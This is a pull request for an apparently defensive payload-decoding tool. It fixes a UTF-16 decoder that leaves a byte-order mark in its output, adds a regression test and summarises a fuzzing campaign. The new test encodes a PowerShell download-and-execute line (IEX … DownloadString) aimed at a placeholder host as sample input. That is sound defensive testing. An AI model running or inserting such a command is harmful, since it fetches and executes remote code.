### PR TITLE
Fix UTF-16 decoder leaving BOM in decoded output (fuzz finding)

### DIFF
--- a/tests/test_engine_hardening_fixes.py
+++ b/tests/test_engine_hardening_fixes.py
@@ -179,3 +179,19 @@ def test_gzip_stream_with_percent_bytes_not_hijacked():
     eng = TitanEngine(Config())
     rep = eng.run_analysis(base64.b64encode(blob))
     assert any("stress.example" in u for u in rep["iocs"]["urls"]), rep["iocs"]
+
+
+def test_utf16_decoder_strips_bom():
+    # Explicit-endian codecs don't consume a leading BOM: it decoded to U+FEFF
+    # and re-encoded as \xef\xbb\xbf at the front of the UTF-8 output,
+    # corrupting the artifact and its hash. PowerShell routinely emits
+    # BOM-prefixed UTF-16, so both endians must round-trip cleanly.
+    from titan_decoder.decoders.base import Utf16Decoder
+
+    text = "IEX (New-Object Net.WebClient).DownloadString('http://b.example/x')"
+    for encoding, bom in (("utf-16-le", b"\xff\xfe"), ("utf-16-be", b"\xfe\xff")):
+        for prefix in (b"", bom):
+            data = prefix + text.encode(encoding)
+            out, ok = Utf16Decoder().decode(data)
+            assert ok, (encoding, bool(prefix))
+            assert out == text.encode("utf-8"), (encoding, bool(prefix), out[:8])

--- a/titan_decoder/decoders/base.py
+++ b/titan_decoder/decoders/base.py
@@ -1109,6 +1109,10 @@ class Utf16Decoder(Decoder):
             return data, False
         try:
             text = data.decode(enc, errors="ignore")
+            # Explicit-endian codecs do not consume a leading BOM: it decodes
+            # to U+FEFF, which would re-encode as \xef\xbb\xbf at the front of
+            # the UTF-8 output, corrupting the artifact and its hash.
+            text = text.lstrip("\ufeff")
             out = text.encode("utf-8", errors="ignore").replace(b"\x00", b"")
             if out and out != data:
                 return out, True


### PR DESCRIPTION
## Summary

A dedicated decoder fuzz campaign found one defect. The campaign ran, against all 21 decoders:

- **84,000 contract-check calls** (random bytes, random text, valid seeds, byte-flip mutations, truncation/splice, pathological repeats) verifying no exceptions escape, `can_decode` returns bool, `decode` returns `(bytes, bool)`, `success=False` returns the input unchanged, and a 2s per-call time budget (worst observed: 16ms)
- **Round-trip correctness fuzzing**: decode(encode(p)) == p for base64 (plain/wrapped/URL-safe/PEM-armored), gzip (incl. multi-member), bz2, lzma, zlib, hex, base32, UU, quoted-printable, UTF-16 — plus heuristic-recovery rates for XOR (95%) and ROT13 (75%, both gated by design)
- **Resource-cap verification**: 200MB decompression bombs fed directly to Gzip/Bz2/LZMA/ZLIB/PDF with a 1MB cap (all held), OLE signature flood (bounded), 200-deep ASN.1 nesting (no RecursionError)

**The one bug**: when UTF-16 input carries a BOM, the explicit-endian codec doesn't consume it, so U+FEFF re-encoded as `\xef\xbb\xbf` at the front of the UTF-8 output — corrupting the decoded artifact and its hash. PowerShell routinely emits BOM-prefixed UTF-16. Fix: strip the BOM after decoding. Verified over 1,600 BOM/endian combinations (0 failures, was 800/1600).

## Checklist

- [x] I am not including real incident evidence, logs, browser history databases, or other sensitive data.
- [x] I am not including secrets (API keys/tokens/passwords).
- [x] I ran tests locally (`pytest -q`) or explain why not.
- [x] I updated docs if flags/output contracts changed. (No flag/contract changes.)
- [x] Changes are dependency-light and preserve offline-first, deterministic behavior. (One-line fix + regression test.)

## Testing

- Command(s) run:

```bash
pytest -q                                  # 200 passed (1 new regression test)
python -m ruff check titan_decoder tests   # clean
```

- Notes: re-ran the condensed fuzz rounds post-fix — 0 contract failures, 0 round-trip failures.

## Screenshots / Output (optional)

```
contract fuzz fails: 0
roundtrip fails: 0
UTF16 BOM roundtrip fails after fix: 0 /1600 cases
```

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01FBD3hFmfRXwL2uZHU2TnhC

---
_Generated by [Claude Code](https://claude.ai/code/session_01FBD3hFmfRXwL2uZHU2TnhC)_